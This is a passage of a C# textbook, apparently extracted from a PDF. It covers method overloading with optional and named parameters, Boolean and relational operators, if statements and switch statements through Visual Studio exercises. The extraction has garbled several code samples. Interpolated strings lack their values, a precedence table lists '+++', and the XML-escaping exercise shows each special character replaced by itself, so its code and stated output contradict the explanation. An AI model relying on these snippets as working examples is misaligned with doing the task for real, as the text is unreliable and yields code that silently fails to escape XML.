below the run method. This is the same version of the method that you
implemented in the previous set of exercises, except that it takes two
optional parameters with default values. The method also prints a
message indicating the version of the calculateFee method that was
called. (You will add overloaded implementations of this method in the
following steps.)
Click here to view code image
private double calculateFee(double dailyRate = 500.0, int
noOfDays = 1)
{
Console.WriteLine("calculateFee using two optional
Download from finelybook [email protected]
164
parameters");
return dailyRate * noOfDays;
}
4. Add another implementation of the calculateFee method to the Program
class, as shown in the code below. This version takes one optional
parameter, called dailyRate, of type double. The body of the method
calculates and returns the fee for a single day only.
Click here to view code image
private double calculateFee(double dailyRate = 500.0)
{
Console.WriteLine("calculateFee using one optional
parameter");
int defaultNoOfDays = 1;
return dailyRate * defaultNoOfDays;
}
5. Add a third implementation of the calculateFee method to the Program
class. This version takes no parameters and uses hardcoded values for
the daily rate and number of days.
Click here to view code image
private double calculateFee()
{
Console.WriteLine("calculateFee using hardcoded values");
double defaultDailyRate = 400.0;
int defaultNoOfDays = 1;
return defaultDailyRate * defaultNoOfDays;
}
6. At the Beginning of the run method, add the following statements in
bold that call calculateFee and display the results:
Click here to view code image
public void run()
{
double fee = calculateFee();
Console.WriteLine($"Fee is ");
}
Tip You can quickly view the definition of a method from the
Download from finelybook [email protected]
165
statement that invokes it. To do so, right-click the method call and
then click Peek Definition. The following image shows the Peek
Definition window for the calculateFee method.
This feature is extremely useful if your code is split across
multiple files, or even if it is in the same file, but the file is very
long.
7. On the Debug menu, click Start Without Debugging to build and run the
program.
The program runs in a console window and displays the following
messages:
Click here to view code image
calculateFee using hardcoded values
Fee is 400
The run method called the version of calculateFee that takes no
parameters rather than either of the implementations that take optional
parameters because that version most closely matches the method call.
Press any key to close the console window and return to Visual Studio.
8. In the run method, modify the statement that calls calculateFee to match
the code shown in bold here:
Download from finelybook [email protected]
166
Click here to view code image
public void run()
{
double fee = calculateFee(650.0);
Console.WriteLine($"Fee is ");
}
9. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
Click here to view code image
calculateFee using one optional parameter
Fee is 650
This time, the run method called the version of calculateFee that takes
one optional parameter. As before, this is the version that most closely
matches the method call.
Press any key to close the console window and return to Visual Studio.
10. In the run method, modify the statement that calls calculateFee again:
Click here to view code image
public void run()
{
double fee = calculateFee(500.0, 3);
Console.WriteLine($"Fee is ");
}
11. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
Click here to view code image
calculateFee using two optional parameters
Fee is 1500
As you might expect from the previous two cases, the run method called
the version of calculateFee that takes two optional parameters.
Press any key to close the console window and return to Visual Studio.
Download from finelybook [email protected]
167
12. In the run method, modify the statement that calls calculateFee and
specify the dailyRate parameter by name:
Click here to view code image
public void run()
{
double fee = calculateFee(dailyRate : 375.0);
Console.WriteLine($"Fee is ");
}
13. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
Click here to view code image
calculateFee using one optional parameter
Fee is 375
As earlier, the run method calls the version of calculateFee that takes
one optional parameter. Changing the code to use a named argument
does not change the way in which the compiler resolves the method call
in this example.
Press any key to close the console window and return to Visual Studio.
14. In the run method, modify the statement that calls calculateFee and
specify the noOfDays parameter by name.
Click here to view code image
public void run()
{
double fee = calculateFee(noOfDays : 4);
Console.WriteLine($"Fee is ");
}
15. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
Click here to view code image
calculateFee using two optional parameters
Fee is 2000
Download from finelybook [email protected]
168
This time, the run method called the version of calculateFee that takes
two optional parameters. The method call has omitted the first parameter
(dailyRate) and specified the second parameter by name. The version of
the calculateFee method that takes two optional parameters is the only
one that matches the call.
Press any key to close the console window and return to Visual Studio.
16. Modify the implementation of the calculateFee method that takes two
optional parameters. Change the name of the first parameter to
theDailyRate and update the return statement to match that shown in
bold in the following code:
Click here to view code image
private double calculateFee(double theDailyRate = 500.0, int
noOfDays = 1)
{
Console.WriteLine("calculateFee using two optional
parameters");
return theDailyRate * noOfDays;
}
17. In the run method, modify the statement that calls calculateFee and
specify the theDailyRate parameter by name.
Click here to view code image
public void run()
{
double fee = calculateFee(theDailyRate : 375.0);
Console.WriteLine("Fee is ");
}
18. On the Debug menu, click Start Without Debugging to build and run the
program.
The program displays the following messages:
Click here to view code image
calculateFee using two optional parameters
Fee is 375
The previous time that you specified the fee but not the daily rate (step
12), the run method called the version of calculateFee that takes one
optional parameter. This time, the run method called the version of
Download from finelybook [email protected]
169
calculateFee that takes two optional parameters. In this case, using a
named argument has changed the way in which the compiler resolves
the method call. If you specify a named argument, the compiler
compares the argument name to the names of the parameters specified in
the method declarations and selects the method that has a parameter with
a matching name. If you had specified the argument as aDailyRate:
375.0 in the call to the calculateFee method, the program would have
failed to compile because no version of the method has a parameter that
matches this name.
Press any key to close the console window and return to Visual Studio.
Summary
In this chapter, you learned how to define methods to implement a named
block of code. You saw how to pass parameters into methods and how to
return data from methods. You also saw how to call a method, pass
arguments, and obtain a return value. You learned how to define overloaded
methods with different parameter lists, and you saw how the scope of a
variable determines where it can be accessed. Then, you used the Visual
Studio 2017 debugger to step through code as it runs. Finally, you learned
how to write methods that take optional parameters and how to call methods
by using named parameters.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 4, “Using decision statements.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Declare a
method
Write the method within a class. Specify the method
name, parameter list, and return type, followed by the
body of the method between braces. For example:
Click here to view code image
Download from finelybook [email protected]
170
int addValues(int leftHandSide, int
rightHandSide) { ... }
Return a value
from within a
method
Write a return statement within the method. For example:
Click here to view code image
return leftHandSide + rightHandSide;
Return multiple
values from
within a
method
Write a return statement that returns a tuple. For example:
return (division, remainder);
Return from a
method before
the end of the
method
Write a return statement within the method. For example:
return;
Define an
expression-
bodied method
Use the => sequence followed by the expression that
defines the body of the method and a closing semicolon.
For example:
Click here to view code image
double calculateFee(double dailyRate, int noOfDays)
=> dailyRate * noOfDays;
Call a method
Write the name of the method followed by any arguments
between parentheses. For example:
addValues(39, 3);
Call a method
that returns a
tuple
Invoke the method as above, but assign the result to a set
of variables enclosed in parenthesis. There should be one
variable for each value of the tuple being returned. For
example:
Click here to view code image
int division, remainder; (division,
remainder) = divide(leftHandSide,
rightHandSide);
Use the
Right-click a call to the method, and then click Generate
Download from finelybook [email protected]
171
Generate
Method Stub
Wizard
Method Stub.
Create a nested
method
Define the method within the body of another method. For
example:
Click here to view code image
long CalculateFactorial(string input)
{
...
long factorial (int dataValue)
{
if (dataValue == 1)
{
return 1;
}
else
{
return dataValue * factorial(dataValue -
1);
}
}
...
}
Display the
Debug toolbar
On the View menu, point to Toolbars, and then click
Debug.
Step into a
method
On the Debug toolbar, click Step Into.
or
On the Debug menu, click Step Into.
Step out of a
method
On the Debug toolbar, click Step Out.
or
On the Debug menu, click Step Out.
Specify an
optional
parameter to a
method
Provide a default value for the parameter in the method
declaration. For example:
Click here to view code image
void optMethod(int first, double second = 0.0,
string third
= "Hello") { ... }
Pass a method
Specify the name of the parameter in the method call. For
Download from finelybook [email protected]
172
argument as a
named
parameter
example:
Click here to view code image
optMethod(first : 100, third :
"World");
Download from finelybook [email protected]
173
CHAPTER 4
Using decision statements
After completing this chapter, you will be able to:
Declare Boolean variables.
Use Boolean operators to create expressions whose outcome is either
true or false.
Write if statements to make decisions based on the result of a Boolean
expression.
Write switch statements to make more complex decisions.
Chapter 3, “Writing methods and applying scope,” shows how to group
related statements into methods. It also demonstrates how to use parameters
to pass information to a method and how to use return statements to pass
information out of a method. Dividing a program into a set of discrete
methods, each designed to perform a specific task or calculation, is a
necessary design strategy. Many programs need to solve large and complex
problems. Breaking up a program into methods helps you to understand these
problems and focus on how to solve them, one piece at a time.
The methods in Chapter 3 are very straightforward, with each statement
executing sequentially after the previous statement completes. However, to
solve many real-world problems, you also need to be able to write code that
selectively performs different actions and that takes different paths through a
method depending on the circumstances. In this chapter, you’ll learn how to
accomplish this task.
Download from finelybook [email protected]
174
Declaring Boolean variables
In the world of C# programming (unlike in the real world), everything is
black or white, right or wrong, true or false. For example, if you create an
integer variable called x, assign the value 99 to it, and then ask whether x
contains the value 99, the answer is definitely true. If you ask if x is less than
10, the answer is definitely false. These are examples of Boolean expressions.
A Boolean expression always evaluates to true or false.
Note The answers to these questions are not necessarily definitive for
all other programming languages. An unassigned variable has an
undefined value, and you cannot, for example, say that it is definitely
less than 10. Issues such as this one are a common source of errors in C
and C++ programs. The Microsoft Visual C# compiler solves this
problem by ensuring that you always assign a value to a variable before
examining it. If you try to examine the contents of an unassigned
variable, your program will not compile.
Visual C# provides a data type called bool. A bool variable can hold one
of two values: true or false. For example, the following three statements
declare a bool variable called areYouReady, assign true to that variable, and
then write its value to the console:
Click here to view code image
bool areYouReady;
areYouReady = true;
Console.WriteLine(areYouReady); // writes True to the console
Using Boolean operators
A Boolean operator is an operator that performs a calculation whose result is
either true or false. C# has several very useful Boolean operators, the
simplest of which is the NOT operator, represented by the exclamation point
Download from finelybook [email protected]
175
(!). The ! operator negates a Boolean value, yielding the opposite of that
value. In the preceding example, if the value of the variable areYouReady is
true, the value of the expression !areYouReady is false.
Understanding equality and relational operators
Two Boolean operators that you will frequently use are equality (==) and
inequality (!=). These are binary operators with which you can determine
whether one value is the same as another value of the same type, yielding a
Boolean result. The following table summarizes how these operators work,
using an int variable called age as an example.
Operator
Meaning
Example
Outcome if age is 42
==
Equal to
age == 100
False
!=
Not equal to
age != 0
True
Don’t confuse the equality operator == with the assignment operator =.
The expression x==y compares x with y and has the value true if the values
are the same. The expression x=y assigns the value of y to x and returns the
value of y as its result.
Closely related to == and != are the relational operators. You use these
operators to find out whether a value is less than or greater than another value
of the same type. The following table shows how to use these operators.
Operator
Meaning
Example
Outcome if age is 42
<
Less than
age < 21
False
<=
Less than or equal to
age <= 18
False
>
Greater than
age > 16
True
>=
Greater than or equal to
age >= 42
True
Understanding conditional logical operators
C# also provides two other binary Boolean operators: the logical AND
operator, which is represented by the && symbol, and the logical OR
Download from finelybook [email protected]
176
operator, which is represented by the || symbol. Collectively, these are known
as the conditional logical operators. Their purpose is to combine two
Boolean expressions or values into a single Boolean result. These operators
are similar to the equality and relational operators in that the value of the
expressions in which they appear is either true or false, but they differ in that
the values on which they operate must also be either true or false.
The outcome of the && operator is true if and only if both of the Boolean
expressions it’s evaluating are true. For example, the following statement
assigns the value true to validPercentage if and only if the value of percent is
greater than or equal to 0 and the value of percent is less than or equal to 100:
Click here to view code image
bool validPercentage;
validPercentage = (percent >= 0) && (percent <= 100);
Tip A common beginner’s error is to try to combine the two tests by
naming the percent variable only once, like this:
Click here to view code image
percent >= 0 && <= 100 // this statement will not compile
Using p arentheses helps to avoid this type of mistake and also
clarifies the purpose of the expression. For example, compare
Click here to view code image
validPercentage = percent >= 0 && percent <= 100
and
Click here to view code image
validPercentage = (percent >= 0) && (percent <= 100)
Both expressions return the same value because the precedence of
the && operator is less than that of >= and <=. However, the second
expression conveys its purpose in a more readable manner.
Download from finelybook [email protected]
177
The outcome of the || operator is true if either of the Boolean expressions
it evaluates is true. You use the || operator to determine whether any one of a
combination of Boolean expressions is true. For example, the following
statement assigns the value true to invalidPercentage if the value of percent
is less than 0 or the value of percent is greater than 100:
Click here to view code image
bool invalidPercentage;
invalidPercentage = (percent < 0) || (percent > 100);
Short-circuiting
The && and || operators both exhibit a feature called short-circuiting.
Sometimes, it is not necessary to evaluate both operands when ascertaining
the result of a conditional logical expression. For example, if the left operand
of the && operator evaluates to false, the result of the entire expression must
be false, regardless of the value of the right operand. Similarly, if the value of
the left operand of the || operator evaluates to true, the result of the entire
expression must be true, irrespective of the value of the right operand. In
these cases, the && and || operators bypass the evaluation of the right
operand. Here are some examples:
(percent >= 0) && (percent <= 100)
In this expression, if the value of percent is less than 0, the Boolean
expression on the left side of && evaluates to false. This value means that the
result of the entire expression must be false, and the Boolean expression to
the right of the && operator is not evaluated.
(percent < 0) || (percent > 100)
In this expression, if the value of percent is less than 0, the Boolean
expression on the left side of || evaluates to true. This value means that the
result of the entire expression must be true, and the Boolean expression to the
right of the || operator is not evaluated.
If you carefully design expressions that use the conditional logical
operators, you can boost the performance of your code by avoiding
unnecessary work. Place simple Boolean expressions that can be evaluated
easily on the left side of a conditional logical operator, and put more complex
expressions on the right side. In many cases, you will find that the program
Download from finelybook [email protected]
178
does not need to evaluate the more complex expressions.
Summarizing operator precedence and associativity
The following table summarizes the precedence and associativity of all the
operators you have learned about so far. Operators in the same category have
the same precedence. The operators in categories higher up in the table take
precedence over operators in categories lower down.
Category
Operators Description
Associativity
Primary
()
++
--
Precedence override
Post-increment
Post-decrement
Left
Unary
!
+
-
+++
--
Logical NOT
Returns the value of the operand
unchanged
Returns the value of the operand
negated
Pre-increment
Pre-decrement
Left
Multiplicative *
/
%
Multiply
Divide
Division remainder (modulus)
Left
Additive
+
-
Addition
Subtraction
Left
Relational
<
<=
Less than
Less than or equal to
Greater than
Greater than or equal to
Left
Download from finelybook [email protected]
179
>
>=
Equality
==
!=
Equal to
Not equal to
Left
Conditional
AND
&&
Conditional AND
Left
Conditional
OR
||
Conditional OR
Left
Assignment
=
Assigns the right-hand operand
to the left and returns the value
that was assigned
Right
Notice that the && operator and the || operator have a different
precedence: && is higher than ||.
Using if statements to make decisions
In a method, when you want to choose between executing two different
statements depending on the result of a Boolean expression, you can use an if
statement.
Understanding if statement syntax
The syntax of an if statement is as follows (if and else are C# keywords):
Click here to view code image
if ( booleanExpression )
statement-1;
else
statement-2;
If the booleanExpression evaluates to true, statement-1 runs; otherwise,
statement-2 runs. The else keyword and the subsequent statement-2 are
optional. If there is no else clause and the booleanExpression is false,
Download from finelybook [email protected]
180
execution continues with whatever code follows the if statement. Also, notice
that the Boolean expression must be enclosed in parentheses; otherwise, the
code will not compile.
For example, here’s an if statement that increments a variable representing
the second hand of a stopwatch. (Minutes are ignored for now.) If the value
of the seconds variable is 59, it is reset to 0; otherwise, it is incremented by
using the ++ operator:
Click here to view code image
int seconds;
...
if (seconds == 59)
seconds = 0;
else
seconds++;
Boolean expressions only, please!
The expression in an if statement must be enclosed in parentheses.
Additionally, the expression must be a Boolean expression. In some
other languages—notably C and C++—you can write an integer
expression, and the compiler will silently convert the integer value to
true (nonzero) or false (0). C# does not support this behavior, and the
compiler reports an error if you write such an expression.
If you accidentally specify the assignment operator (=) instead of the
equality test operator (==) in an if statement, the C# compiler
recognizes your mistake and refuses to compile your code, such as in
the following example:
Click here to view code image
int seconds;
...
if (seconds = 59) // compile-time error
...
if (seconds == 59) // ok
Accidental assignments were another common source of bugs in C
and C++ programs, which would silently convert the value assigned
(59) to a Boolean expression (with anything nonzero considered to be
Download from finelybook [email protected]
181
true), with the result being that the code following the if statement
would be performed every time.
Incidentally, you can use a Boolean variable as the expression for an
if statement, although it must still be enclosed in parentheses, as shown
in this example:
Click here to view code image
bool inWord;
...
if (inWord == true) // ok, but not commonly used
...
if (inWord) // more common and considered better style
Using blocks to group statements
Notice that the syntax of the if statement shown earlier specifies a single
statement after the if (booleanExpression) and a single statement after the
else keyword. Sometimes you’ll want to perform more than one statement
when a Boolean expression is true. You could group the statements inside a
new method and then call the new method, but a simpler solution is to group
the statements inside a block. A block is simply a sequence of statements
grouped between an opening brace and a closing brace.
In the following example, two statements that reset the seconds variable to
0 and increment the minutes variable are grouped inside a block, and the
entire block executes if the value of seconds is equal to 59:
Click here to view code image
int seconds = 0;
int minutes = 0;
...
if (seconds == 59)
{
seconds = 0;
minutes++;
}
else
{
seconds++;
}
Download from finelybook [email protected]
182
Important If you omit the braces, the C# compiler associates only the
first statement (seconds = 0;) with the if statement. The subsequent
statement (minutes++;) will not be recognized by the compiler as part
of the if statement when the program is compiled. Furthermore, when
the compiler reaches the else keyword, it will not associate it with the
previous if statement; instead, it will report a syntax error. Therefore, it
is good practice to always define the statements for each branch of an if
statement within a block, even if a block consists of only a single
statement. It might save you some grief later if you want to add
additional code.
A block also starts a new scope. You can define variables inside a block,
but they will disappear at the end of the block. The following code fragment
illustrates this point:
Click here to view code image
if (...)
{
int myVar = 0;
... // myVar can be used here
} // myVar disappears here
else
{
// myVar cannot be used here
...
}
// myVar cannot be used here
Cascading if statements
You can nest if statements inside other if statements. In this way, you can
chain together a sequence of Boolean expressions, which are tested one after
the other until one of them evaluates to true. In the following example, if the
value of day is 0, the first test evaluates to true and dayName is assigned the
string “Sunday”. If the value of day is not 0, the first test fails and control
passes to the else clause, which runs the second if statement and compares the
Download from finelybook [email protected]
183
value of day with 1. The second if statement executes only if the first test is
false. Similarly, the third if statement executes only if the first and second
tests are false.
Click here to view code image
if (day == 0)
{
dayName = "Sunday";
}
else if (day == 1)
{
dayName = "Monday";
}
else if (day == 2)
{
dayName = "Tuesday";
}
else if (day == 3)
{
dayName = "Wednesday";
}
else if (day == 4)
{
dayName = "Thursday";
}
else if (day == 5)
{
dayName = "Friday";
}
else if (day == 6)
{
dayName = "Saturday";
}
else
{
dayName = "unknown";
}
In the following exercise, you’ll write a method that uses a cascading if
statement to compare two dates.
Write if statements
1. Start Microsoft Visual Studio 2017, if it is not already running.
2. Open the Selection solution, which is located in the \Microsoft
Press\VCSBS\Chapter 4\ Selection folder in your Documents folder.
Download from finelybook [email protected]
184
3. On the Debug menu, click Start Debugging.
Visual Studio 2017 builds and runs the application. The form displays
two DatePicker controls, called firstDate and secondDate. Both controls
display the current date.
4. Click Compare.
The following text appears in the text box in the lower half of the
window:
Click here to view code image
firstDate == secondDate : False
firstDate != secondDate : True
firstDate < secondDate : False
firstDate <= secondDate : False
firstDate > secondDate : True
firstDate >= secondDate : True
The Boolean expression, firstDate == secondDate, should be true
because both firstDate and secondDate are set to the current date. In
fact, only the less-than operator and the greater-than-or-equal-to
operator seem to be working correctly. The following image shows the
application running.
Download from finelybook [email protected]
185
5. Return to Visual Studio 2017. On the Debug menu, click Stop
Debugging.
6. Display the code for the MainPage.xaml.cs file in the Code and Text
Editor window.
7. Locate the compareClick method, which should look like this:
Click here to view code image
private void compareClick(object sender, RoutedEventArgs e)
{
int diff = dateCompare(firstDate.Date.LocalDateTime,
secondDate.Date.LocalDateTime);
info.Text = "";
show("firstDate == secondDate", diff == 0);
show("firstDate != secondDate", diff != 0);
show("firstDate < secondDate", diff < 0);
show("firstDate <= secondDate", diff <= 0);
show("firstDate > secondDate", diff > 0);
show("firstDate >= secondDate", diff >= 0);
}
This method runs whenever the user clicks the Compare button on the
form. The expressions firstDate.Date.LocalDateTime and
secondDate.Date.LocalDateTime hold DateTime values; they represent
Download from finelybook [email protected]
186
the dates displayed in the firstDate and secondDate controls on the form
elsewhere in the application. The DateTime data type is just another data
type, like int or float, except that it contains subelements with which you
can access the individual pieces of a date, such as the year, month, or
day.
The compareClick method passes the two DateTime values to the
dateCompare method. The purpose of this method is to compare dates
and return the int value 0 if they are the same, −1 if the first date is less
than the second, and +1 if the first date is greater than the second. A date
is considered greater than another date if it comes after it
chronologically. You will examine the dateCompare method in the next
step.
The show method displays the results of the comparison in the info text
box control in the lower half of the form.
8. Locate the dateCompare method, which should look like this:
Click here to view code image
private int dateCompare(DateTime leftHandSide, DateTime
rightHandSide)
{
// TO DO
return 42;
}
This method currently returns the same value whenever it is called rather
than 0, 1, or +1, regardless of the values of its parameters. This explains
why the application is not working as expected. You need to implement
the logic in this method to compare two dates correctly.
9. Remove the // TO DO comment and the return statement from the
dateCompare method.
10. Add the following statements shown in bold to the body of the
dateCompare method:
Click here to view code image
private int dateCompare(DateTime leftHandSide, DateTime
rightHandSide)
{
int result = 0;
Download from finelybook [email protected]
187
if (leftHandSide.Year < rightHandSide.Year)
{
result = -1;
}
else if (leftHandSide.Year > rightHandSide.Year)
{
result = 1;
}
}
Note Don’t try to build the application yet. The dateCompare
method is not complete, and the build will fail.
If the expression leftHandSide.Year < rightHandSide.Year is true, the
date in leftHandSide must be earlier than the date in rightHandSide, so
the program sets the result variable to −1. Otherwise, if the expression
leftHandSide.Year > rightHandSide.Year is true, the date in
leftHandSide must be later than the date in rightHandSide, and the
program sets the result variable to 1.
If the expression leftHandSide.Year < rightHandSide.Year is false and
the expression leftHandSide.Year > rightHandSide.Year is also false, the
Year property of both dates must be the same, so the program needs to
compare the months in each date.
11. Add the following statements shown in bold to the body of the
dateCompare method. Type them immediately after the code you
entered in the preceding step:
Click here to view code image
private int dateCompare(DateTime leftHandSide, DateTime
rightHandSide)
{
...
else if (leftHandSide.Month < rightHandSide.Month)
{
result = -1;
Download from finelybook [email protected]
188
}
else if (leftHandSide.Month > rightHandSide.Month)
{
result = 1;
}
}
These statements compare months following a logic similar to that used
to compare years in the preceding step.
If the expression leftHandSide.Month < rightHandSide.Month is false
and the expression leftHandSide.Month > rightHandSide.Month is also
false, the Month property of both dates must be the same, so the program
finally needs to compare the days in each date.
12. Add the following statements shown in bold to the body of the
dateCompare method after the code you entered in the preceding two
steps. Also, remove the return 42 statement that you added earlier:
Click here to view code image
private int dateCompare(DateTime leftHandSide, DateTime
rightHandSide)
{
...
else if (leftHandSide.Day < rightHandSide.Day)
{
result = -1;
}
else if (leftHandSide.Day > rightHandSide.Day)
{
result = 1;
}
else
{
result = 0;
}
return result;
}
You should recognize the pattern in this logic by now.
If leftHandSide.Day < rightHandSide.Day and leftHandSide.Day >
rightHandSide.Day both are false, the value in the Day properties in
both variables must be the same. The Month values and the Year values
must also be identical, respectively, for the program logic to have
Download from finelybook [email protected]
189
reached this point, so the two dates must be the same, and the program
sets the value of result to 0.
The final statement returns the value stored in the result variable.
13. On the Debug menu, click Start Debugging to rebuild and run the
application.
14. Click Compare.
The following text appears in the text box:
Click here to view code image
firstDate == secondDate : True
firstDate != secondDate : False
firstDate < secondDate: False
firstDate <= secondDate: True
firstDate > secondDate: False
firstDate >= secondDate: True
These are the correct results for identical dates.
15. Use the DatePicker controls to select a later date for the second date and
then click Compare.
The following text appears in the text box:
Click here to view code image
firstDate == secondDate: False
firstDate != secondDate: True
firstDate < secondDate: True
firstDate <= secondDate: True
firstDate > secondDate: False
firstDate >= secondDate: False
Again, these are the correct results when the first date is earlier than the
second date.
16. Test some other dates, and verify that the results are as you would
expect. Return to Visual Studio 2017 and stop debugging when you
have finished.
Comparing dates in real-world applications
Download from finelybook [email protected]
190
Now that you have seen how to use a rather long and complicated
series of if and else statements, I should mention that this is not the
technique you would employ to compare dates in a real-world
application. If you look at the dateCompare method from the
preceding exercise, you will see that the two parameters,
leftHandSide and rightHandSide, are DateTime values. The logic
you have written compares only the date part of these parameters,
but they also contain a time element that you have not considered
(or displayed). For two DateTime values to be considered equal,
they should have not only the same date but also the same time.
Comparing dates and times is such a common operation that the
DateTime type actually has a built-in method called Compare for
doing just that: it takes two DateTime arguments and compares
them, returning a value indicating whether the first argument is
less than the second, in which case the result will be negative;
whether the first argument is greater than the second, in which case
the result will be positive; or whether both arguments represent the
same date and time, in which case the result will be 0.
Using switch statements
Sometimes when you write a cascading if statement, each of the if statements
look similar because they all evaluate an identical expression. The only
difference is that each if compares the result of the expression with a different
value. For example, consider the following block of code that uses an if
statement to examine the value in the day variable and work out which day of
the week it is:
Click here to view code image
if (day == 0)
{
dayName = "Sunday";
}
else if (day == 1)
{
dayName = "Monday";
}
Download from finelybook [email protected]
191
else if (day == 2)
{
dayName = "Tuesday";
}
else if (day == 3)
{
...
}
else
{
dayName = "Unknown";
}
Often in these situations, you can rewrite the cascading if statement as a
switch statement to make your program more efficient and more readable.
Understanding switch statement syntax
The syntax of a switch statement is as follows (switch, case, and default are
keywords):
Click here to view code image
switch ( controllingExpression )
{
case constantExpression :
statements
break;
case constantExpression :
statements
break;
...
default :
statements
break;
}
The controllingExpression, which must be enclosed in parentheses, is
evaluated once. Control then jumps to the block of code identified by the
constantExpression whose value is equal to the result of the
controllingExpression. (The constantExpression identifier is also called a
case label.) Execution runs as far as the break statement, at which point the
switch statement finishes and the program continues at the first statement that
follows the closing brace of the switch statement. If none of the
constantExpression values is equal to the value of the controllingExpression,
the statements below the optional default label run.
Download from finelybook [email protected]
192
Note Each constantExpression value must be unique so that the
controllingExpression will match only one of them. If the value of the
controllingExpression does not match any constantExpression value
and there is no default label, program execution continues with the first
statement that follows the closing brace of the switch statement.
So, you can rewrite the previous cascading if statement as the following
switch statement:
Click here to view code image
switch (day)
{
case 0 :
dayName = "Sunday";
break;
case 1 :
dayName = "Monday";
break;
case 2 :
dayName = "Tuesday";
break;
...
default :
dayName = "Unknown";
break;
}
Following the switch statement rules
The basic switch statement is very useful, but unfortunately, you can’t always
use it when you might like to. Any switch statement you write must adhere to
the following rules:
You can use switch only on certain data types, such as int, char, or
string. With any other types (including float and double), you must use
an if statement.
The case labels must be constant expressions, such as 42 if the switch
Download from finelybook [email protected]
193
data type is an int, ‘42’ if the switch data type is a char, or “42” if the
switch data type is a string. If you need to calculate your case label
values at runtime, you must use an if statement.
The case labels must be unique expressions. In other words, two case
labels cannot have the same value.
You can specify that you want to run the same statements for more
than one value by providing a list of case labels and no intervening
statements, in which case the code for the final label in the list is
executed for all cases in that list. However, if a label has one or more
associated statements, execution cannot fall through to subsequent
labels; in this case, the compiler generates an error. The following code
fragment illustrates these points:
Click here to view code image
switch (trumps)
{
case Hearts :
case Diamonds : // Fall-through allowed - no code between
labels
color = "Red"; // Code executed for Hearts and Diamonds
break;
case Clubs :
color = "Black";
case Spades : // Error - code between labels
color = "Black";
break;
}
Note The break statement is the most common way to stop fall-through,
but you can also use a return statement to exit from the method
containing the switch statement or a throw statement to generate an
exception and abort the switch statement. The throw statement is
described in Chapter 6, “Managing errors and exceptions.”
Download from finelybook [email protected]
194
switch fall-through rules
Because you cannot accidentally fall through from one case label to the
next if there is any intervening code, you can freely rearrange the
sections of a switch statement without affecting its meaning (including
the default label, which by convention is usually—but does not have to
be—placed as the last label).
C and C++ programmers should note that the break statement is
mandatory for every case in a switch statement (even the default case).
This requirement is a good thing—it is common in C or C++ programs
to forget the break statement, allowing execution to fall through to the
next label and leading to bugs that are difficult to spot.
If you really want to, you can mimic C/C++ fall-through in C# by
using a goto statement to go to the following case or default label.
Using goto, in general, is not recommended, though, and this book does
not show you how to do it.
In the following exercise, you will complete a program that reads the
characters of a string and maps each character to its XML representation. For
example, the left angle bracket character (<) has a special meaning in XML
(it’s used to form elements). If you have data that contains this character, it
must be translated into the text entity < so that an XML processor knows
that it is data and not part of an XML instruction. Similar rules apply to the
right angle bracket (>), ampersand (&), single quotation mark (‘), and double
quotation mark (“) characters. You will write a switch statement that tests the
value of the character and traps the special XML characters as case labels.
Write switch statements
1. Start Visual Studio 2017, if it is not already running.
2. Open the SwitchStatement solution, which is located in the \Microsoft
Press\VCSBS\Chapter 4\SwitchStatement folder in your Documents
folder.
Download from finelybook [email protected]
195
3. On the Debug menu, click Start Debugging.
Visual Studio 2017 builds and runs the application. The application
displays a form containing two text boxes separated by a Copy button.
4. Type the following sample text into the upper text box:
Click here to view code image
inRange = (lo <= number) && (hi >= number);
5. Click Copy.
The statement is copied verbatim into the lower text box, and no
translation of the <, &, or > characters occurs, as shown in the following
screen shot.
6. Return to Visual Studio 2017 and stop debugging.
7. Display the code for MainPage.xaml.cs in the Code and Text Editor
window and locate the copyOne method. It currently looks like this:
Click here to view code image
private void copyOne(char current)
Download from finelybook [email protected]
196
{
switch (current)
{
default:
target.Text += current;
break;
}
}
The copyOne method copies the character specified as its input
parameter to the end of the text displayed in the lower text box. At the
moment, copyOne contains a switch statement with a single default
action. In the following few steps, you will modify this switch statement
to convert characters that are significant in XML to their XML mapping.
For example, the < character will be converted to the string <.
8. Add the following statements shown in bold to the switch statement after
the opening brace for the statement and directly before the default label:
Click here to view code image
switch (current)
{
case '<' :
target.Text += "<";
break;
default:
target.Text += current;
break;
}
If the current character being copied is a left angle bracket (<), the
preceding code appends the string “<” to the text being output in its
place.
9. Add the following cases to the switch statement after the break
statement you have just added, but above the default label:
Click here to view code image
case '>' :
target.Text += ">";
break;
case '&' :
target.Text += "&";
break;
case '\"' :
target.Text += """;
Download from finelybook [email protected]
197
break;
case '\'' :
target.Text += "'";
break;
Note The single quotation mark (‘) and double quotation mark (“)
have a special meaning in C#—they are used to delimit character
and string constants. The backslash (\) in the final two case labels
is an escape character that causes the C# compiler to treat these
characters as literals rather than as delimiters.
10. On the Debug menu, click Start Debugging.
11. Type the following text into the upper text box:
Click here to view code image
inRange = (lo <= number) && (hi >= number);
12. Click Copy.
The statement is copied into the lower text box. This time, each
character undergoes the XML mapping implemented in the switch
statement. The target text box displays the following text:
Click here to view code image
inRange = (lo <= number) && (hi >= number);
13. Experiment with other strings and verify that all special characters (<, >,
&, “ , and ‘ ) are handled correctly.
14. Return to Visual Studio and stop debugging.
Summary
In this chapter, you learned about Boolean expressions and variables. You
saw how to use Boolean expressions with the if and switch statements to
Download from finelybook [email protected]
198
make decisions in your programs, and you combined Boolean expressions by
using the Boolean operators.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 5, “Using compound assignment and
iteration statements.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Determine whether two values are
equivalent
Use the == operator or the !=
operator. For example:
answer == 42
Compare the value of two expressions
Use the <, <=, >, or >= operator.
For example:
age >= 21
Declare a Boolean variable
Use the bool keyword as the
type of the variable. For
example:
bool inRange;
Create a Boolean expression that is true
only if two conditions are both true
Use the && operator. For
example:
Click here to view code image
inRange = (lo <= number) &&
(number <= hi);
Create a Boolean expression that is true
if either of two conditions is true
Use the || operator. For example:
Click here to view code image
outOfRange = (number < lo) ||
(hi < number);
Download from finelybook [email protected]
199
Run a statement if a condition is true
Use an if statement. For
example:
Click here to view code image
if (inRange)
process();
Run more than one statement if a
condition is true
Use an if statement and a block.
For example:
Click here to view code image
